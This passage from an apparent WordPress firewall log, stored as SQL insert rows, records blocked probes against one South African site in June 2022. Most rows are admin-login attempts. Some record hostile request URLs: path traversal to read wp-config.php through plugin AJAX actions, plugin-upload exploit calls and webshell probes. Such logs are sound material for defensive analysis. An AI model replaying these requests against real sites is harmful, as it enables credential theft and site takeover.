11:57:10','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6580,'2022-06-03 12:59:18','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6581,'2022-06-03 14:21:33','134.209.150.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(6582,'2022-06-03 15:21:20','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6583,'2022-06-03 16:05:53','62.171.169.89','https://smithandsmith.co.za/wp-login.php','404shield',''),(6584,'2022-06-03 20:38:22','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6585,'2022-06-03 22:20:53','194.233.75.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(6586,'2022-06-03 23:26:56','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6587,'2022-06-03 23:42:02','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6588,'2022-06-04 01:19:46','13.81.28.183','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6589,'2022-06-04 05:17:44','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6590,'2022-06-04 06:24:26','103.56.112.76','https://smithandsmith.co.za/wp-login.php','404shield',''),(6591,'2022-06-04 08:55:12','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6592,'2022-06-04 10:32:26','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6593,'2022-06-04 14:05:24','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6594,'2022-06-04 16:09:35','2.56.57.26','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6595,'2022-06-04 16:10:16','2.56.57.26','https://smithandsmith.co.za/wp-content/uploads/typehub/custom/lzqffsrq/.sp3ctra_XO.php?Fox=d3wL7','404shield',''),(6596,'2022-06-04 16:10:43','2.56.57.26','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(6597,'2022-06-04 18:15:31','103.110.9.34','https://smithandsmith.co.za/wp-login.php','404shield',''),(6598,'2022-06-04 19:33:41','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6599,'2022-06-04 21:24:43','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6600,'2022-06-04 22:56:00','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6601,'2022-06-05 03:53:02','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6602,'2022-06-05 07:45:26','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6603,'2022-06-05 08:22:03','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6604,'2022-06-05 11:12:34','185.174.159.43','http://smithandsmith.co.za/contact/','httpbl',''),(6605,'2022-06-05 11:12:34','185.174.159.43','http://smithandsmith.co.za/','httpbl',''),(6606,'2022-06-05 11:12:35','185.174.159.43','http://smithandsmith.co.za/','httpbl',''),(6607,'2022-06-05 12:05:10','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6608,'2022-06-05 13:17:19','20.229.176.5','https://smithandsmith.co.za/wp-admin.php','404shield',''),(6609,'2022-06-05 17:44:41','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6610,'2022-06-05 19:15:24','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6611,'2022-06-05 20:16:34','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6612,'2022-06-06 02:47:07','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6613,'2022-06-06 04:29:47','138.197.173.121','https://smithandsmith.co.za/wp-login.php','404shield',''),(6614,'2022-06-06 04:33:20','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6615,'2022-06-06 06:26:51','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6616,'2022-06-06 11:34:21','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6617,'2022-06-06 12:56:17','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6618,'2022-06-06 17:26:11','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6619,'2022-06-06 18:02:33','35.194.233.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(6620,'2022-06-06 20:47:26','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6621,'2022-06-06 21:16:11','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6622,'2022-06-06 22:55:07','20.222.3.188','https://smithandsmith.co.za/wp-content/index.php','404shield',''),(6623,'2022-06-07 04:32:40','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6624,'2022-06-07 05:33:12','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6625,'2022-06-07 06:37:30','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6626,'2022-06-07 14:10:10','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6627,'2022-06-07 15:34:28','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6628,'2022-06-07 16:54:54','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6629,'2022-06-07 17:49:07','192.81.214.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(6630,'2022-06-08 00:03:29','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6631,'2022-06-08 02:33:19','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6632,'2022-06-08 03:08:52','185.51.134.201','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6633,'2022-06-08 10:06:08','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6634,'2022-06-08 13:03:39','20.83.26.133','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(6635,'2022-06-08 13:04:19','20.83.26.133','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(6636,'2022-06-08 13:04:45','20.83.26.133','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6637,'2022-06-08 13:35:26','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6638,'2022-06-08 15:42:09','20.193.152.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(6639,'2022-06-08 15:42:09','20.193.152.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(6640,'2022-06-08 15:42:09','20.193.152.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(6641,'2022-06-08 20:10:36','103.146.202.150','https://smithandsmith.co.za/wp-login.php','404shield',''),(6642,'2022-06-08 20:22:33','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6643,'2022-06-08 21:49:09','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6644,'2022-06-09 00:27:59','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6645,'2022-06-09 01:59:10','20.92.226.231','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6646,'2022-06-09 05:51:55','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6647,'2022-06-09 08:13:35','189.125.37.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(6648,'2022-06-09 09:46:20','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6649,'2022-06-09 11:20:43','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6650,'2022-06-09 17:55:42','149.202.87.41','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php','404shield',''),(6651,'2022-06-09 17:55:42','149.202.87.41','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php','404shield',''),(6652,'2022-06-09 17:55:43','149.202.87.41','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php','404shield',''),(6653,'2022-06-09 18:17:44','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6654,'2022-06-09 19:26:06','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6655,'2022-06-09 22:03:57','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6656,'2022-06-10 00:22:07','158.255.80.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(6657,'2022-06-10 02:24:39','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6658,'2022-06-10 05:02:17','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6659,'2022-06-10 08:46:20','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6660,'2022-06-10 10:31:44','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6661,'2022-06-10 14:41:20','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6662,'2022-06-10 17:21:04','162.144.49.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(6663,'2022-06-10 18:48:45','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6664,'2022-06-10 19:24:31','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6665,'2022-06-11 00:17:43','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6666,'2022-06-11 03:39:31','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6667,'2022-06-11 06:06:09','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6668,'2022-06-11 10:03:42','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6669,'2022-06-11 12:34:13','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6670,'2022-06-11 16:53:09','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6671,'2022-06-11 17:27:02','88.99.3.235','https://smithandsmith.co.za/wp-content/themes/twentyfive/include.php','404shield',''),(6672,'2022-06-11 17:27:05','88.99.3.235','https://smithandsmith.co.za/wp-content/themes/twentyfive/include.php','404shield',''),(6673,'2022-06-11 18:01:21','185.197.195.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(6674,'2022-06-11 18:56:00','20.254.62.86','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6675,'2022-06-11 21:21:53','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6676,'2022-06-12 03:42:09','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6677,'2022-06-12 06:38:33','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6678,'2022-06-12 08:11:52','185.242.180.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(6679,'2022-06-12 09:41:35','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6680,'2022-06-12 12:53:07','20.5.24.216','https://smithandsmith.co.za/wp-login.php','404shield',''),(6681,'2022-06-12 12:53:07','20.5.24.216','https://smithandsmith.co.za/wp-login.php','404shield',''),(6682,'2022-06-12 12:53:07','20.5.24.216','https://smithandsmith.co.za/wp-login.php','404shield',''),(6683,'2022-06-12 14:30:23','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6684,'2022-06-12 17:11:47','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6685,'2022-06-12 19:20:35','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6686,'2022-06-13 00:47:19','194.38.20.161','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin','404shield',''),(6687,'2022-06-13 01:21:21','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6688,'2022-06-13 03:25:39','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6689,'2022-06-13 04:59:18','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6690,'2022-06-13 07:43:52','79.137.141.196','https://smithandsmith.co.za/wp-login.php','404shield',''),(6691,'2022-06-13 12:07:32','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6692,'2022-06-13 13:00:03','157.245.198.117','https://smithandsmith.co.za/wp-login.php','404shield',''),(6693,'2022-06-13 14:31:01','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6694,'2022-06-13 14:36:54','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6695,'2022-06-13 19:37:09','85.119.122.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(6696,'2022-06-13 22:57:22','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6697,'2022-06-14 00:16:42','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6698,'2022-06-14 02:09:35','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6699,'2022-06-14 09:55:59','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6700,'2022-06-14 12:21:34','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6701,'2022-06-14 15:22:17','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6702,'2022-06-14 15:53:27','162.214.197.206','https://smithandsmith.co.za/wp-login.php','404shield',''),(6703,'2022-06-14 15:57:24','15.235.45.154','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(6704,'2022-06-14 19:08:15','185.174.159.43','http://smithandsmith.co.za/contact/','httpbl',''),(6705,'2022-06-14 19:08:15','185.174.159.43','http://smithandsmith.co.za/','httpbl',''),(6706,'2022-06-14 19:08:16','185.174.159.43','http://smithandsmith.co.za/','httpbl',''),(6707,'2022-06-14 19:43:15','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6708,'2022-06-14 23:08:19','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6709,'2022-06-15 01:50:06','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6710,'2022-06-15 04:10:06','134.249.60.197','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6711,'2022-06-15 04:10:06','134.249.60.197','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6712,'2022-06-15 04:10:06','134.249.60.197','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6713,'2022-06-15 08:36:43','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6714,'2022-06-15 12:35:07','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6715,'2022-06-15 16:30:29','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6716,'2022-06-15 19:27:34','184.107.95.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(6717,'2022-06-15 20:42:23','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6718,'2022-06-15 23:23:47','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6719,'2022-06-16 02:12:43','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6720,'2022-06-16 05:43:37','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6721,'2022-06-16 10:12:25','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6722,'2022-06-16 11:56:29','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6723,'2022-06-16 15:02:14','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6724,'2022-06-16 18:04:39','20.232.201.5','https://smithandsmith.co.za/wp-content/uploads/2021/12/up.php','404shield',''),(6725,'2022-06-16 18:04:41','20.232.201.5','https://smithandsmith.co.za/wp-content/ALFA_DATA/alfacgiapi/','404shield',''),(6726,'2022-06-16 18:04:47','20.232.201.5','https://smithandsmith.co.za/wp-admin/alfa.php','404shield',''),(6727,'2022-06-16 20:53:41','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6728,'2022-06-16 21:34:47','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6729,'2022-06-16 22:30:10','20.211.40.51','https://smithandsmith.co.za/wp-content/index.php','404shield',''),(6730,'2022-06-17 07:01:20','101.32.62.196','https://smithandsmith.co.za/wp-login.php','404shield',''),(6731,'2022-06-17 07:16:10','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6732,'2022-06-17 07:38:03','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6733,'2022-06-17 07:59:25','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6734,'2022-06-17 14:46:42','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6735,'2022-06-17 16:57:29','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6736,'2022-06-17 18:22:56','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6737,'2022-06-17 20:09:00','177.55.124.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(6738,'2022-06-17 21:39:08','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6739,'2022-06-18 02:41:04','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6740,'2022-06-18 05:05:20','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6741,'2022-06-18 12:22:27','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6742,'2022-06-18 14:53:35','91.238.160.165','https://smithandsmith.co.za/wp-login.php','404shield',''),(6743,'2022-06-18 15:44:50','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6744,'2022-06-18 19:25:50','144.76.19.118','https://www.smithandsmith.co.za/wp-content/themes/twentyfive/include.php','404shield',''),(6745,'2022-06-18 19:26:17','144.76.19.118','https://www.smithandsmith.co.za/wp-content/themes/sketch/404.php','404shield',''),(6746,'2022-06-18 19:38:29','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6747,'2022-06-18 20:17:03','193.201.9.12','https://smithandsmith.co.za/wp-content/plugins/background-image-cropper/accesson.php','404shield',''),(6748,'2022-06-18 22:02:51','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6749,'2022-06-19 02:27:19','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6750,'2022-06-19 07:50:46','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6751,'2022-06-19 13:08:13','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6752,'2022-06-19 17:34:57','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6753,'2022-06-19 18:33:32','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6754,'2022-06-19 20:28:53','20.211.40.51','https://smithandsmith.co.za/wp-content/index.php','404shield',''),(6755,'2022-06-19 21:53:09','20.83.31.18','https://smithandsmith.co.za/wp-admin/alfacgiapi/perl.alfa','404shield',''),(6756,'2022-06-19 21:53:10','20.83.31.18','https://smithandsmith.co.za/wp-content/alfacgiapi/perl.alfa','404shield',''),(6757,'2022-06-19 21:53:18','20.83.31.18','https://smithandsmith.co.za/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa','404shield',''),(6758,'2022-06-19 23:46:52','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6759,'2022-06-20 00:55:04','220.88.49.227','https://smithandsmith.co.za/wp-login.php','404shield',''),(6760,'2022-06-20 03:18:31','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6761,'2022-06-20 04:48:18','23.81.231.238','https://smithandsmith.co.za/wp-login.php','404shield',''),(6762,'2022-06-20 10:32:38','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6763,'2022-06-20 13:04:49','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6764,'2022-06-20 14:19:52','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6765,'2022-06-20 16:53:03','128.199.109.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(6766,'2022-06-20 17:38:36','23.154.177.18','http://smithandsmith.co.za/contact/','httpbl',''),(6767,'2022-06-20 17:38:37','23.154.177.18','http://smithandsmith.co.za/','httpbl',''),(6768,'2022-06-20 17:53:20','188.71.223.151','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(6769,'2022-06-20 21:11:38','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6770,'2022-06-21 08:01:00','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6771,'2022-06-21 08:09:57','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6772,'2022-06-21 11:39:56','37.120.217.166','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6773,'2022-06-21 11:41:17','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/cherry-plugin/admin/css/tinymce-shortcodes.css','404shield',''),(6774,'2022-06-21 17:19:02','164.92.205.253','https://smithandsmith.co.za/wp-login.php','404shield',''),(6775,'2022-06-21 17:49:51','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6776,'2022-06-21 18:36:08','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6777,'2022-06-22 03:24:01','92.205.56.212','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(6778,'2022-06-22 03:29:10','188.214.122.86','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6779,'2022-06-22 05:18:08','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6780,'2022-06-22 09:08:16','129.211.171.161','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(6781,'2022-06-22 12:19:41','77.65.215.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(6782,'2022-06-22 13:04:40','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6783,'2022-06-22 15:35:29','85.128.143.99','https://smithandsmith.co.za/wp-login.php','404shield',''),(6784,'2022-06-22 16:06:31','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6785,'2022-06-22 18:12:03','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6786,'2022-06-22 23:41:57','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6787,'2022-06-23 00:20:52','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=upload.php','404shield',''),(6788,'2022-06-23 03:07:35','188.241.177.230','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6789,'2022-06-23 03:39:39','88.99.2.19','https://smithandsmith.co.za/wp-content/themes/twentyfive/include.php','404shield',''),(6790,'2022-06-23 03:39:47','88.99.2.19','https://smithandsmith.co.za/wp-content/themes/sketch/404.php','404shield',''),(6791,'2022-06-23 04:54:22','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6792,'2022-06-23 07:39:08','194.126.177.26','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6793,'2022-06-23 08:15:54','178.128.248.162','https://smithandsmith.co.za/wp-login.php','404shield',''),(6794,'2022-06-23 14:24:39','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6795,'2022-06-23 18:32:04','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6796,'2022-06-23 20:12:35','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6797,'2022-06-23 21:57:42','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6798,'2022-06-24 02:33:17','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6799,'2022-06-24 06:07:15','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6800,'2022-06-24 08:23:47','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6801,'2022-06-24 08:28:49','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6802,'2022-06-24 09:23:43','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/jquery-html5-file-upload/readme.txt','404shield',''),(6803,'2022-06-24 11:56:22','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6804,'2022-06-24 11:56:23','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6805,'2022-06-24 13:44:28','193.201.9.12','https://smithandsmith.co.za/wp-content/plugins/background-image-cropper/image/ico/accesson.php','404shield',''),(6806,'2022-06-24 14:17:27','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6807,'2022-06-24 16:34:10','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6808,'2022-06-24 17:14:45','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6809,'2022-06-24 17:47:32','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6810,'2022-06-24 20:07:52','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6811,'2022-06-24 20:21:09','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6812,'2022-06-24 23:03:11','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6813,'2022-06-24 23:10:56','40.113.237.169','https://smithandsmith.co.za/wp-admin/includes/','404shield',''),(6814,'2022-06-24 23:12:18','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6815,'2022-06-24 23:39:20','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6816,'2022-06-25 01:48:18','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6817,'2022-06-25 04:00:18','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6818,'2022-06-25 04:51:18','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6819,'2022-06-25 06:04:27','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6820,'2022-06-25 06:30:44','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6821,'2022-06-25 07:26:59','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6822,'2022-06-25 09:15:23','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6823,'2022-06-25 09:55:24','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6824,'2022-06-25 10:42:22','85.119.122.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(6825,'2022-06-25 11:38:02','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6826,'2022-06-25 12:54:56','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6827,'2022-06-25 13:23:42','159.69.26.216','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(6828,'2022-06-25 13:24:26','159.69.26.216','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6829,'2022-06-25 13:24:37','159.69.26.216','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(6830,'2022-06-25 13:47:23','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6831,'2022-06-25 14:49:27','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6832,'2022-06-25 16:50:21','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6833,'2022-06-25 17:11:46','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6834,'2022-06-25 18:46:49','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6835,'2022-06-25 19:52:44','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6836,'2022-06-25 20:10:42','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6837,'2022-06-25 20:37:13','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6838,'2022-06-25 23:06:43','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6839,'2022-06-25 23:54:44','194.38.20.161','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=showbiz_ajax_action&client_action=update_plugin','404shield',''),(6840,'2022-06-26 00:22:40','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6841,'2022-06-26 01:47:49','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6842,'2022-06-26 03:42:14','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6843,'2022-06-26 05:48:05','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6844,'2022-06-26 06:10:39','194.126.177.48','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6845,'2022-06-26 06:26:30','185.94.193.148','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6846,'2022-06-26 07:18:21','103.42.58.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(6847,'2022-06-26 07:21:36','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6848,'2022-06-26 08:10:48','196.240.54.119','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6849,'2022-06-26 10:10:05','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(6850,'2022-06-26 